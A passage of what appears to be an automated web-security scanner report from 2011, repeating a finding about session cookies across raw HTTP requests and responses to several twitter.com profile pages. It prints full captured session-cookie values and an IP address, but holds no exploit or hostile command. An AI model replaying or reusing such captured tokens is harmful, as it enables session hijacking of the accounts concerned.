HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:54 GMT Server: hi Status: 200 OK X-Transaction: 1296265974-66159-11366 ETag: "0c7b3f1ee02a220dddae84a56bd4dae8" Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT X-Runtime: 0.01364 Content-Type: text/html; charset=utf-8 Content-Length: 51000 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Gr8BosFoodBank HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:22 GMT Server: hi Status: 200 OK X-Transaction: 1296265282-79208-29747 ETag: "a6d77c28a643e235a002a7eb55dd8452" Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT X-Runtime: 0.00773 Content-Type: text/html; charset=utf-8 Content-Length: 53288 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Harvard HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:56 GMT Server: hi Status: 200 OK X-Transaction: 1296265976-30452-57191 ETag: "f592e2869b28d974ff30653c3b748799" Last-Modified: Sat, 29 Jan 2011 01:52:56 GMT X-Runtime: 0.01723 Content-Type: text/html; charset=utf-8 Content-Length: 51819 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Jarvis_Green HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:28 GMT Server: hi Status: 200 OK X-Transaction: 1296265288-56506-41031 ETag: "1fbdd011dd022432b9be5211b927eb5e" Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT X-Runtime: 0.00821 Content-Type: text/html; charset=utf-8 Content-Length: 29885 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /JennyMcCarthy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:22 GMT Server: hi Status: 200 OK X-Transaction: 1296266001-863-44101 ETag: "f38aec6749f0462266c3dd505da4c784" Last-Modified: Sat, 29 Jan 2011 01:53:22 GMT X-Runtime: 0.01378 Content-Type: text/html; charset=utf-8 Content-Length: 49671 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /John_W_Henry HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:23 GMT Server: hi Status: 200 OK X-Transaction: 1296266003-90291-22061 ETag: "39b5637104095258c2612985611f2081" Last-Modified: Sat, 29 Jan 2011 01:53:23 GMT X-Runtime: 0.00864 Content-Type: text/html; charset=utf-8 Content-Length: 40419 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /KaseyRKahl HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:48 GMT Server: hi Status: 200 OK X-Transaction: 1296265968-89789-38719 ETag: "91cc7fb3c644ed10961b8761bb947762" Last-Modified: Sat, 29 Jan 2011 01:52:48 GMT X-Runtime: 0.01025 Content-Type: text/html; charset=utf-8 Content-Length: 50928 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /KhloeKardashian HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:28 GMT Server: hi Status: 200 OK X-Transaction: 1296266008-48453-14084 ETag: "a10b004421cd49a7bf1036242f788900" Last-Modified: Sat, 29 Jan 2011 01:53:28 GMT X-Runtime: 0.01326 Content-Type: text/html; charset=utf-8 Content-Length: 52081 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /KimKardashian HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:58 GMT Server: hi Status: 200 OK X-Transaction: 1296266038-98911-11256 ETag: "162e94dddb4eb4f4491a26acce7fb49a" Last-Modified: Sat, 29 Jan 2011 01:53:58 GMT X-Runtime: 0.37290 Content-Type: text/html; charset=utf-8 Content-Length: 49623 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Late_Show HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:26 GMT Server: hi Status: 200 OK X-Transaction: 1296265286-91074-55312 ETag: "7b5d59ba88764ae8de6aa055d6a61048" Last-Modified: Sat, 29 Jan 2011 01:41:26 GMT X-Runtime: 0.00803 Content-Type: text/html; charset=utf-8 Content-Length: 39032 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
